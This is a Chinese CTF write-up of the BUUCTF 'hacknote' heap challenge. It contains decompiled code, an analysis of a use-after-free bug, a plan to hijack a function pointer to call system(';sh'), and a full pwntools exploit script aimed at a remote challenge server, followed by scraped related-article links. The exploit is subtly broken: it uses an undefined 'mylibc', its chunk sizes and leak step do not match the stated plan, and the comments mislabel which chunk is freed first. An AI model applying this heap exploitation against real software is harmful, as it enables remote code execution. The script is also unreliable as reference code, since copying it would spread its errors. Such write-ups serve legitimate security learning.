Rt1Text
Rt1Text

BUUCTF-PWN-pwnable_hacknote-UAF

1.checksec+运行

BUUCTF-PWN-pwnable_hacknote-UAF_第1张图片

 标准的菜单模式

canary和NX保护

2.32位IDA

1.sub_8048646()

unsigned int sub_8048646()
{
  int v0; // ebx
  int i; // [esp+Ch] [ebp-1Ch]
  int size; // [esp+10h] [ebp-18h]
  char buf[8]; // [esp+14h] [ebp-14h] BYREF
  unsigned int v5; // [esp+1Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  if ( dword_804A04C <= 5 )
  {
    for ( i = 0; i <= 4; ++i )
    {
      if ( !*(&ptr + i) )
      {
        *(&ptr + i) = malloc(8u); //malloc 0x8 的chunk,叫note块
        if ( !*(&ptr + i) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        *(_DWORD *)*(&ptr + i) = sub_804862B; //note[0]存放puts()函数的地址
        printf("Note size :");
        read(0, buf, 8u);
        size = atoi(buf);
        v0 = (int)*(&ptr + i);
        *(_DWORD *)(v0 + 4) = malloc(size);  //malloc size 的chunk,叫content块
        if ( !*((_DWORD *)*(&ptr + i) + 1) )  //note[1]存放content的地址
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Content :");
        read(0, *((void **)*(&ptr + i) + 1), size); //存放我们申请堆块的size
        puts("Success !");
        ++dword_804A04C;
        return __readgsdword(0x14u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full");
  }
  return __readgsdword(0x14u) ^ v5;
}

2.sub_80487D4()

unsigned int sub_80487D4()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= dword_804A04C )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&ptr + v1) )
  {
    free(*((void **)*(&ptr + v1) + 1)); //释放note块
    free(*(&ptr + v1));                 //释放content块
    puts("Success");                    //两个chunk都没有被置NULL,存在UAF漏洞
  }
  return __readgsdword(0x14u) ^ v3;
}

3.sub_80488A5()

unsigned int sub_80488A5()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= dword_804A04C )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&ptr + v1) )
    (*(void (__cdecl **)(_DWORD))*(&ptr + v1))(*(&ptr + v1)); //调用puts()函数
  return __readgsdword(0x14u) ^ v3;                //输出note块chunk存放地址的内容
}

利用思路

泄露libc,调用system,执行bin/sh/,获取shell

泄露libc

print note可以打印泄露地址

  1. 先add chunk0,add chunk1,大小都为0x80。
  2. 然后delete chunk1,chuk0.此时再申请add chunk2,大小为8.
  3. chunk2的note块是chunk0的note块,chunk2的content块是chunk1的note块。
  4. 向content2中写入puts函数地址和free@got表地址
  5. 调用 show(chunk2),执行puts和free@got表地址,将free函数的实际地址泄露,再根据偏移泄露system函数地址。

调用system执行bin/sh/

传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,

原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,

system参数用";sh\x00"或者"||sh"截断

EXP

from pwn import *
context(arch='i386',os='linux',log_level='debug')
elf = ELF('./hacknoteuaf')
libc = ELF('./libc-2.23-32.so')
p = remote("node4.buuoj.cn",27486)

def add_note(size,content):
    p.recvuntil("choice :")
    p.sendline("1")
    p.recvuntil("size :")
    p.sendline(str(size))
    p.recvuntil("Content :")
    p.sendline(content)

def del_note(index):
    p.recvuntil("choice :")
    p.sendline("2")
    p.recvuntil("Index :")
    p.sendline(str(index))

def print_note(index):
    p.recvuntil("choice :")
    p.sendline("3")
    p.recvuntil("Index :")
    p.sendline(str(index))


add_note(64,"12")
add_note(32,"12")
del_note(0)
add_note(64,"45")
print_note(2)

libc_addr = u32(p.recv(8)[4:8]) - 0x1b07b0
sys_addr = libc_addr + mylibc.symbols['system']

# add_note(8,"12")
# add_note(8,"34")
# del_note(3)
# del_note(4)
del_note(0)
del_note(1)
add_note(8,p32(sys_addr)+";sh\x00")
print_note(0)
p.interactive()

BUUCTF-PWN-pwnable_hacknote-UAF_第2张图片

 

你可能感兴趣的:(BUUCTF,大数据,pwn,安全,linux,c++)

  • 查看Linux服务器的相关配置信息 听说唐僧不吃肉 Linux服务器配置信息
    一、总结1、查看cpu信息cat/etc/cpuinfo针对cpu数,来作出以下总结:#总核数=物理CPU个数X每颗物理CPU的核数#总逻辑CPU数=物理CPU个数X每颗物理CPU的核数X超线程数#1、查看物理CPU个数cat/proc/cpuinfo|grep"physicalid"|sort|uniq|wc
  • 如何查看华为服务器配置信息,华为服务器查看配置 Zcc四月 如何查看华为服务器配置信息
    华为服务器查看配置内容精选换一换网站的访问与云服务器的网络配置、端口通信、防火墙配置、安全组配置等多个环节相关联。任意一个环节出现问题,都会导致网站无法访问。本节操作介绍网站无法访问时的排查思路。关于网站无法访问排查思路的操作视频请点击:https://bbs.huaweicloud.com/videos/103592如果打开网站有报错提示信息,首先应该根据报错提示信息在华为云上安装完成后输入公网
  • 系统服务器一般都要求冗余配置,服务器冗余配置 白药葫芦 系统服务器一般都要求冗余配置
    服务器冗余配置内容精选换一换迁移前,若选择迁移到已有服务器,请做以下准备工作:需配置目的端服务器所在VPC安全组,如果是Windows系统需要开放TCP的8899端口、8900端口和22端口;如果是Linux系统,块级迁移开放8900端口和22端口,文件级迁移开放22端口。请参见如何配置目的端服务器安全组规则?配置目的端服务器VPC安全组。迁移过程中禁止操作目的端弹当目的端设置错误或因业务需求需要
  • linux操作系统短进程优先调度算法,操作系统的常用的进程调度算法 kdddd hdj
    一、调度与调度算法操作系统管理了系统的有限资源,当有多个进程(或多个进程发出的请求)要使用这些资源时,因为资源的有限性,必须按照一定的原则选择进程(请求)来占用资源。这就是调度。目的是控制资源使用者的数量,选取资源使用者许可占用资源或占用资源。在操作系统中调度是指一种资源分配,因而调度算法是指:根据系统的资源分配策略所规定的资源分配算法。对于不同的的系统和系统目标,通常采用不同的调度算法。调度算法
  • 如何查看Linux服务器的硬件配置 Ray.1998 各种命令服务器linux运维
    Linux系统提供了多种命令和工具来查看硬件配置信息。下面是一些常用的方法:1.CPU信息lscpu:提供CPU的详细统计信息,包括型号、核心数、线程数、缓存大小等。Bashlscpu/proc/cpuinfo:包含每个CPU核心的详细参数,如型号、频率、缓存等。Bashcat/proc/cpuinfo2.内存信息free:显示系统内存的使用情况。Bashfree-m/proc/meminfo:提
  • 上传文件到对象存储是选择前端还是后端 nangonghen linux对象存储
    对于云上对象存储的上传方式选择(前端直传或后端代理上传),需综合考虑安全性、性能、成本、业务需求等因素。1.推荐前端直传的场景适用条件:大文件上传(如视频、大型数据集)高并发场景(如用户生成内容平台)需节省服务器带宽成本业务对实时性要求高方案设计:临时凭证(STS)或预签名URL:通过后端服务生成短期有效的安全凭证(如AWSS3预签名URL、阿里云OSSSTS),避免暴露长期密钥。分片上传与断点续
  • C语言笔记(郝斌) cndsdss c语言单片机stm32开发语言笔记linux改行学it
    二次复习做的笔记,很基础,适合新手入门,复习巩固C语言前言1.为什么学习c语言优点:代码量小速度快功能强大可移植性较好缺点:危险性高开发周期长应用领域广:系统软件应用软件为学习数据结构C++打基础2.怎样学C语言多思考多上机多上机多上机目标:能看懂程序,能调试程序3.学习的目标熟练掌握C语言的语法规则理解面向过程的思想4.学习重点流程控制函数指针动态内存分配1.基本编程知识1.1CPU内存条硬盘显
  • 大数据分析服务器硬件配置如何选择 elva428204358 服务器服务器
    大数据,现如今已被人工智能替代。我们先不讨论人工智能,就大数据而言,我们都是在强调他的技术,而我们在用大数据时候,经常用它的来神话它的影响。例如,广告投放精准化,社会安全管理有序,医药行业智能化等。一、建立大数据分析服务器的五个基本方面1、可视化分析:大数据分析的使用者有大数据分析专家,同时还有普通用户,但是他们二者对于大数据分析最基本的要求就是可视化分析,因为可视化分析能够直观的呈现大数据特点,
  • LINUX本地磁盘DISK空间扩容 数据库急诊日记 Linuxlinux运维服务器1024程序员节pythonsqljava
    vmware虚拟机本地磁盘空间不足,虚拟机层面扩容原有磁盘/dev/sda从50G到100G,系统层面fdisk划分磁盘分区,创建pv,添加到vg,扩展lv,xfs_growfs刷新文件系统空间。1.磁盘空间现状df显示/总大小50G[root@glodendb~]#df-hFilesystemSizeUsedAvailUse%Mountedon/dev/mapper/rhel-root45G18
  • 《“漏洞克星”集结令:Java实战派+安全极客,为Z世代打造技术诺亚方舟!》 ELIHU_han 安全开发java网络安全安全web安全计算机网络安全威胁分析系统安全
    【急聘!】Java全栈&安全开发勇士集结!和大学生/IT人一起搞事情,不卷只燃!#Java开发#安全工程师#初创团队招聘#大学生创业我们是谁?我们是一支“小而悍”的极客小队,正在打造一款面向在校大学生和IT新人的技术实战平台!(偷偷剧透:用Java写核心,用安全护数据,用开源搞事情!)拒绝大厂式内卷,专注用代码解决真实痛点。如果你也想“从0到1”参与产品诞生,这里就是你的战场!我们需要这样的你!1
  • 侯捷 C++ 课程学习笔记:C++面向对象开发 『六哥』 C++学习笔记
    学习C++面向对象开发需要具备一些基础。学习过某种proceduurallanguage(C语言最佳)了解变量(variables)、类型(types)、作用域(scope)、循环(loops)、流程控制。知道一个程序需要编译才能被执行。以良好的方式编写C++class是一种基于对象(ObjectBased)classwithoutpointermembers——Complex带指针classwi
  • C++的内存管理 脆脆鲨<码> C++c++开发语言
    1.C/C++内存分布我们先来看下面的一段代码和相关问题intglobalVar=1;staticintstaticGlobalVar=1;voidTest(){staticintstaticVar=1;intlocalVar=1;intnum1[10]={1,2,3,4};charchar2[]="abcd";constchar*pChar3="abcd";int*ptr1=(int*)mall
  • 详细介绍c++标准库中的vector容器 成风693 c++算法
    std::vector是C++标准库中的一个动态数组容器,属于序列容器的一种。它能够存储一组相同类型的元素,并且支持动态调整大小。std::vector提供了高效的随机访问、动态扩展和收缩功能,是C++中最常用的容器之一。主要特性动态数组:std::vector在内部使用动态分配的数组来存储元素,因此它可以在运行时动态调整大小。连续存储:元素在内存中是连续存储的,这使得std::vector支持高
  • linux qt实现窗口跳转_QT 主窗口和子窗口相互切换示例 稚气筱筱 linuxqt实现窗口跳转
    #include"mainwidget.h"MainWidget::MainWidget(QWidget*parent):QWidget(parent){ui.setupUi(this);this->setParent(parent);this->setWindowTitle(QString::fromLocal8Bit("老大"));this->resize(QSize(500,500));bt
  • Android 架构 UseCase最佳实践 fundroid android架构
    Android架构UseCase最佳实践前言UseCase的职责UseCase的命名UseCase的线程安全UseCase的签名依赖UseCase的引用透明UseCase的接口抽象前言Android官方的最新架构中引入了Domain(网域层or领域层),DomainLayer由一个个UseCase组成。但是由于团队套用官方新架构后没有正确地定义UseCase,无法发挥DomainLayer应有的架
  • 《DeepSeek+Langchain落地实操:RAG知识增强检索和智能体实战开发》 AI周红伟 langchain
    大数据与人工智能实战专家—周红伟老师法国科学院数据算法博士/曾任阿里人工智能专家/曾任马上消费金融风控负责人课程背景LangChain是一项旨在赋能开发人员利用语言模型构建端到端应用程序的强大框架。它的设计理念在于简化和加速利用大型语言模型(LLM)和对话模型构建应用程序的过程。这个框架提供了一套全面的工具、组件和接口,旨在简化基于大型语言模型和对话模型的应用程序开发过程。LangChain本质上
  • Linux grep 命令到底有多强?90% 的人只会用最简单的用法! linux
    前言:别再傻傻地翻文件了!grep让你效率翻倍!你有没有遇到过这种情况?日志文件太大,想找某个关键字,翻得眼花缭乱?代码里某个变量到底在哪改的,找半天都没找到?成百上千个文件里,想找某个特定的内容,手动翻找效率太低?如果你还在一行行地Ctrl+F查找内容,那你真的该认识一下Linux里最强大的查找工具——grep!它不仅能帮你快速定位关键内容,还能支持正则匹配、多文件查找、高亮显示,让你在海量数据
  • 史上最全 C/C++ 指针避坑指南:8年老鸟整理的20个致命错误(建议收藏) c++
    大家好,我是小康,一个在C++的坑里摸爬滚打了8年的开发者。今天我要和大家聊聊那些让每个程序员都头疼的指针错误。写了这么久C++,指针还是经常让你头大?代码莫名其妙崩溃,调试半天发现是指针出问题?面试官随便问个指针问题就把你问懵了?放心,不是你一个人!今天我们就用最通俗的语言,聊聊C++指针那些"坑"。记得我刚开始学习的时候,光是看到int*p这样的代码就觉得脑袋瓜子嗡嗡的。但是,指针这个东西吧,
  • 史上最全 C/C++ 指针避坑指南:8年老鸟整理的20个致命错误(建议收藏) c++
    大家好,我是小康,一个在C++的坑里摸爬滚打了8年的开发者。今天我要和大家聊聊那些让每个程序员都头疼的指针错误。写了这么久C++,指针还是经常让你头大?代码莫名其妙崩溃,调试半天发现是指针出问题?面试官随便问个指针问题就把你问懵了?放心,不是你一个人!今天我们就用最通俗的语言,聊聊C++指针那些"坑"。记得我刚开始学习的时候,光是看到int*p这样的代码就觉得脑袋瓜子嗡嗡的。但是,指针这个东西吧,
  • 别再被多线程搞晕了!一篇文章轻松搞懂 Linux 多线程同步! c++linux编程多线程
    前言大家有没有遇到过,代码跑着跑着,线程突然抢资源抢疯了?其实,这都是“多线程同步”在作怪。多线程同步是个老生常谈的话题,可每次真正要处理时还是让人头疼。这篇文章,带你从头到尾掌握Linux的多线程同步,把概念讲成大白话,让你看了不再迷糊,还能拿出来装一装逼!不管是“锁”、“信号量”,还是“条件变量”,我们都一网打尽,赶紧点赞收藏,一文搞懂!一、什么是线程同步?——“排队来操作,按规矩走”线程同步
  • [网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨) Eastmount 网络安全自学篇web安全恶意软件分析恶意样本家族标注MSDefender
    2024新的战场,继续奋斗。“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~前文介绍了IDAPython配置过程和基础用法,然后尝试提取恶意软件
  • 网络安全工具汇总 Hacker_Fuchen web安全安全
    网络安全工具汇总漏洞及渗透练习平台WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication(漏洞练习平台)https://github.com/RandomStorm/DVWA数据库注入练习平台https://github.
  • 网络安全 api 网络安全 ast技术 Hacker_LaoYi web安全githubgit
    随着应用或者API被攻击利用已经越来越多,虽然来自开源组件的漏洞加剧了这一现象的发生,但是,其实主要还是在于应用程序或者API本身没有做好防范,根源在于源代码本身的质量没有严格把控。AST是指ApplicationSecurityTesting,主要包括静态应用测试(SAST)、交互式应用测试(IAST)、动态应用测试(DAST)以及软件成分分析(SCA)等工具。应用测试工具AST是专门用于检测源
  • 超越经典:量子通信技术的发展与未来 Echo_Wish 人工智能前沿技术量子计算
    超越经典:量子通信技术的发展与未来在信息化高速发展的今天,我们习惯于在网上轻松分享消息、转账与数据。然而,随着数据传输变得越来越普遍,信息安全的挑战也与日俱增。当传统加密手段逐渐面对量子计算威胁时,量子通信技术以其独特的物理特性成为保障信息安全的下一个革命性方案。今天,我想和大家聊聊量子通信技术的核心发展脉络及实际应用,并通过Python代码模拟其部分基本原理。虽然“量子”这个词听起来高深莫测,但
  • 数据安全策略与实践:从理论到落地 Echo_Wish 大数据高阶实战秘籍大数据
    数据安全策略与实践:从理论到落地在大数据时代,数据早已成为企业和机构的核心资产,但随之而来的数据泄露、非法访问和滥用问题也屡见不鲜。从用户隐私到企业机密,再到国家级信息安全,无一不受到数据安全的影响。那么,如何构建高效的数据安全策略并在实际中落地实施?这是我们今天要探讨的核心话题。一、数据安全为何重要?数据泄露的影响在2021年某著名社交平台数据泄露事件中,超过5亿用户的个人信息被曝光,直接导致了
  • gethostname 若云止水 c语言
    在POSIX兼容系统(如Linux、Unix、macOS)中,使用的是gethostname()函数,定义在头文件中:#includeintgethostname(char*name,size_tlen);参数说明name:用于存储主机名的字符数组(缓冲区)len:缓冲区的最大长度(以字节为单位)返回值成功时返回0失败时返回-1,并设置errno来指示错误
  • Dask vs. Apache Spark: 大数据处理的利器对比与应用实例 步入烟尘 Python超入门指南全册apachespark大数据
    本文已收录于《Python超入门指南全册》本专栏专门针对零基础和需要进阶提升的同学所准备的一套完整教学,从基础到精通不断进阶深入,后续还有实战项目,轻松应对面试,专栏订阅地址:https://blog.csdn.net/mrdeam/category_12647587.html优点:订阅限时19.9付费专栏,私信博主还可进入全栈VIP答疑群,作者优先解答机会(代码指导、远程服务),群里大佬众多可以
  • #include<set>的用法(自用) Whisper_Ke c++算法数据结构
    是C++标准库中的一个头文件,提供了std::set容器的实现。std::set是一个关联容器,用于存储唯一元素的集合,元素按特定顺序(默认是升序)排列。以下是关于和std::set的详细讲解:1.std::set的特点唯一性:std::set中的元素是唯一的,不允许重复。有序性:元素默认按升序排列(可以通过自定义比较函数改变顺序)。底层实现:通常基于红黑树(一种平衡二叉搜索树),因此插入、删除和
  • centos2anolis dragonzoebai linuxcentosanolis
    我的centos7原地升级到anolis7记录注意:如果是桌面版请先卸载firefox,否则so文件冲突。参考:CentOS7和8Linux系统迁移到国产Linux龙蜥AnolisOS8手册_disablepam_pkcs11moduleinpamconfiguration-CSDN博客关于CentOS迁移龙蜥操作系统,这里有一份详细指南,请查收!-OpenAnolis龙蜥操作系统开源社区Cent
  • Java集合框架全解析:从数据结构到高并发简单解析 微风灬浮尘 javajava数据结构Java集合java入门
    一、集合框架全景图(含Java17新特性)1.集合框架层级关系CollectionListSetQueueMapSortedMapArrayListLinkedListVectorHashSetTreeSetPriorityQueueArrayDequeHashMapTreeMapConcurrentHashMap2.核心接口对比接口有序性唯一性线程安全典型实现类List是允许重复否ArrayLi
  • java Illegal overloaded getter method with ambiguous type for propert的解决 zwllxs javajdk
    好久不来iteye,今天又来看看,哈哈,今天碰到在编码时,反射中会抛出 Illegal overloaded getter method with ambiguous type for propert这么个东东,从字面意思看,是反射在获取getter时迷惑了,然后回想起java在boolean值在生成getter时,分别有is和getter,也许我们的反射对象中就有is开头的方法迷惑了jdk,
  • IT人应当知道的10个行业小内幕 beijingjava 工作互联网
    10. 虽然IT业的薪酬比其他很多行业要好,但有公司因此视你为其“佣人”。   尽管IT人士的薪水没有互联网泡沫之前要好,但和其他行业人士比较,IT人的薪资还算好点。在接下的几十年中,科技在商业和社会发展中所占分量会一直增加,所以我们完全有理由相信,IT专业人才的需求量也不会减少。   然而,正因为IT人士的薪水普遍较高,所以有些公司认为给了你这么多钱,就把你看成是公司的“佣人”,拥有你的支配
  • java 实现自定义链表 CrazyMizzz java数据结构
    1.链表结构   链表是链式的结构 2.链表的组成    链表是由头节点,中间节点和尾节点组成    节点是由两个部分组成:       1.数据域       2.引用域 3.链表的实现 &nbs
  • web项目发布到服务器后图片过一会儿消失 麦田的设计者 struts2上传图片永久保存
      作为一名学习了android和j2ee的程序员,我们必须要意识到,客服端和服务器端的交互是很有必要的,比如你用eclipse写了一个web工程,并且发布到了服务器(tomcat)上,这时你在webapps目录下看到了你发布的web工程,你可以打开电脑的浏览器输入http://localhost:8080/工程/路径访问里面的资源。但是,有时你会突然的发现之前用struts2上传的图片
  • CodeIgniter框架Cart类 name 不能设置中文的解决方法 IT独行者 CodeIgniterCart框架 
    今天试用了一下CodeIgniter的Cart类时遇到了个小问题,发现当name的值为中文时,就写入不了session。在这里特别提醒一下。 在CI手册里也有说明,如下: $data = array( 'id' => 'sku_123ABC', 'qty' => 1, '
  • linux回收站 _wy_ linux回收站
    今天一不小心在ubuntu下把一个文件移动到了回收站,我并不想删,手误了。我急忙到Nautilus下的回收站中准备恢复它,但是里面居然什么都没有。     后来我发现这是由于我删文件的地方不在HOME所在的分区,而是在另一个独立的Linux分区下,这是我专门用于开发的分区。而我删除的东东在分区根目录下的.Trash-1000/file目录下,相关的删除信息(删除时间和文件所在
  • jquery回到页面顶端 知了ing htmljquerycss
    html代码: <h1 id="anchor">页面标题</h1> <div id="container">页面内容</div> <p><a href="#anchor" class="topLink">回到顶端</a><
  • B树、B-树、B+树、B*树 矮蛋蛋 B树
    原文地址: http://www.cnblogs.com/oldhorse/archive/2009/11/16/1604009.html B树        即二叉搜索树:        1.所有非叶子结点至多拥有两个儿子(Left和Right); &nb
  • 数据库连接池 alafqq 数据库连接池
    http://www.cnblogs.com/xdp-gacl/p/4002804.html @Anthor:孤傲苍狼 数据库连接池 用MySQLv5版本的数据库驱动没有问题,使用MySQLv6和Oracle的数据库驱动时候报如下错误: java.lang.ClassCastException: $Proxy0 cannot be cast to java.sql.Connec
  • java泛型 百合不是茶 java泛型
    泛型 在Java SE 1.5之前,没有泛型的情况的下,通过对类型Object的引用来实现参数的“任意化”,任意化的缺点就是要实行强制转换,这种强制转换可能会带来不安全的隐患   泛型的特点:消除强制转换 确保类型安全 向后兼容   简单泛型的定义:      泛型:就是在类中将其模糊化,在创建对象的时候再具体定义 class fan
  • javascript闭包[两个小测试例子] bijian1013 JavaScriptJavaScript
    一.程序一 <script> var name = "The Window"; var Object_a = {   name : "My Object",   getNameFunc : function(){ var that = this;     return function(){     
  • 探索JUnit4扩展:假设机制(Assumption) bijian1013 javaAssumptionJUnit单元测试
    一.假设机制(Assumption)概述        理想情况下,写测试用例的开发人员可以明确的知道所有导致他们所写的测试用例不通过的地方,但是有的时候,这些导致测试用例不通过的地方并不是很容易的被发现,可能隐藏得很深,从而导致开发人员在写测试用例时很难预测到这些因素,而且往往这些因素并不是开发人员当初设计测试用例时真正目的,
  • 【Gson四】范型POJO的反序列化 bit1129 POJO
    在下面这个例子中,POJO(Data类)是一个范型类,在Tests中,指定范型类为PieceData,POJO初始化完成后,通过 String str = new Gson().toJson(data); 得到范型化的POJO序列化得到的JSON串,然后将这个JSON串反序列化为POJO   import com.google.gson.Gson; import java.
  • 【Spark八十五】Spark Streaming分析结果落地到MySQL bit1129 Stream
    几点总结: 1. DStream.foreachRDD是一个Output Operation,类似于RDD的action,会触发Job的提交。DStream.foreachRDD是数据落地很常用的方法 2. 获取MySQL Connection的操作应该放在foreachRDD的参数(是一个RDD[T]=>Unit的函数类型),这样,当foreachRDD方法在每个Worker上执行时,
  • NGINX + LUA实现复杂的控制 ronin47 nginx lua
    安装lua_nginx_module 模块 lua_nginx_module 可以一步步的安装,也可以直接用淘宝的OpenResty Centos和debian的安装就简单了。。 这里说下freebsd的安装: fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz tar zxvf lua-5.1.4.tar.gz cd lua-5.1.4 ma
  • java-递归判断数组是否升序 bylijinnan java
    public class IsAccendListRecursive { /*递归判断数组是否升序 * if a Integer array is ascending,return true * use recursion */ public static void main(String[] args){ IsAccendListRecursiv
  • Netty源码学习-DefaultChannelPipeline2 bylijinnan javanetty
    Netty3的API http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/ChannelPipeline.html 里面提到ChannelPipeline的一个“pitfall”: 如果ChannelPipeline只有一个handler(假设为handlerA)且希望用另一handler(假设为handlerB) 来
  • Java工具之JPS chinrui java
    JPS使用     熟悉Linux的朋友们都知道,Linux下有一个常用的命令叫做ps(Process Status),是用来查看Linux环境下进程信息的。同样的,在Java Virtual Machine里面也提供了类似的工具供广大Java开发人员使用,它就是jps(Java Process Status),它可以用来
  • window.print分页打印 ctrain window
    function init() { var tt = document.getElementById("tt"); var childNodes = tt.childNodes[0].childNodes; var level = 0; for (var i = 0; i < childNodes.length; i++) {
  • 安装hadoop时 执行jps命令Error occurred during initialization of VM daizj jdkhadoopjps
    在安装hadoop时,执行JPS出现下面错误   [slave16]root@192.168.11.10:/tmp/hsperfdata_hdfs# jps Error occurred during initialization of VM java.lang.Error: Properties init: Could not determine current working
  • PHP开发大型项目的一点经验 dcj3sjt126com PHP重构
    一、变量 最好是把所有的变量存储在一个数组中,这样在程序的开发中可以带来很多的方便,特别是当程序很大的时候。变量的命名就当适合自己的习惯,不管是用拼音还是英语,至少应当有一定的意义,以便适合记忆。变量的命名尽量规范化,不要与PHP中的关键字相冲突。 二、函数 PHP自带了很多函数,这给我们程序的编写带来了很多的方便。当然,在大型程序中我们往往自己要定义许多个函数,几十
  • android笔记之--向网络发送GET/POST请求参数 dcj3sjt126com android
    使用GET方法发送请求 private static boolean sendGETRequest (String path, Map<String, String> params) throws Exception{ //发送地http://192.168.100.91:8080/videoServi
  • linux复习笔记 之bash shell (3) 通配符 eksliang linux 通配符linux通配符
    转载请出自出处: http://eksliang.iteye.com/blog/2104387 在bash的操作环境中有一个非常有用的功能,那就是通配符。 下面列出一些常用的通配符,如下表所示 符号 意义 * 万用字符,代表0个到无穷个任意字符 ? 万用字符,代表一定有一个任意字符 [] 代表一定有一个在中括号内的字符。例如:[abcd]代表一定有一个字符,可能是a、b、c
  • Android关于短信加密 gqdy365 android
    关于Android短信加密功能,我初步了解的如下(只在Android应用层试验):     1、因为Android有短信收发接口,可以调用接口完成短信收发;         发送过程:APP(基于短信应用修改)接受用户输入号码、内容——>APP对短信内容加密——>调用短信发送方法Sm
  • asp.net在网站根目录下创建文件夹 hvt .netC#hovertreeasp.netWeb Forms
    假设要在asp.net网站的根目录下建立文件夹hovertree,C#代码如下: string m_keleyiFolderName = Server.MapPath("/hovertree"); if (Directory.Exists(m_keleyiFolderName)) { //文件夹已经存在 return; } else { try { D
  • 一个合格的程序员应该读过哪些书 justjavac 程序员书籍
    编者按:2008年8月4日,StackOverflow 网友 Bert F 发帖提问:哪本最具影响力的书,是每个程序员都应该读的? “如果能时光倒流,回到过去,作为一个开发人员,你可以告诉自己在职业生涯初期应该读一本, 你会选择哪本书呢?我希望这个书单列表内容丰富,可以涵盖很多东西。” 很多程序员响应,他们在推荐时也写下自己的评语。 以前就有国内网友介绍这个程序员书单,不过都是推荐数
  • 单实例实践 跑龙套_az 单例
       1、内部类 public class Singleton { private static class SingletonHolder { public static Singleton singleton = new Singleton(); } public Singleton getRes
  • PO VO BEAN 理解 q137681467 VODTOpo
    PO:      全称是 persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。 好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。     BO:     全称是 business object:业务对象 主要作用是把业务逻辑封装为一个对象。这个对
  • 战胜惰性,暗自努力 金笛子 努力
    偶然看到一句很贴近生活的话:“别人都在你看不到的地方暗自努力,在你看得到的地方,他们也和你一样显得吊儿郎当,和你一样会抱怨,而只有你自己相信这些都是真的,最后也只有你一人继续不思进取。”很多句子总在不经意中就会戳中一部分人的软肋,我想我们每个人的周围总是有那么些表现得“吊儿郎当”的存在,是否你就真的相信他们如此不思进取,而开始放松了对自己的要求随波逐流呢? 我有个朋友是搞技术的,平时嘻嘻哈哈,以
  • NDK/JNI二维数组多维数组传递 wenzongliang 二维数组jniNDK
    多维数组和对象数组一样处理,例如二维数组里的每个元素还是一个数组 用jArray表示,直到数组变为一维的,且里面元素为基本类型,去获得一维数组指针。给大家提供个例子。已经测试通过。 Java_cn_wzl_FiveChessView_checkWin( JNIEnv* env,jobject thiz,jobjectArray qizidata) { jint i,j; int s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他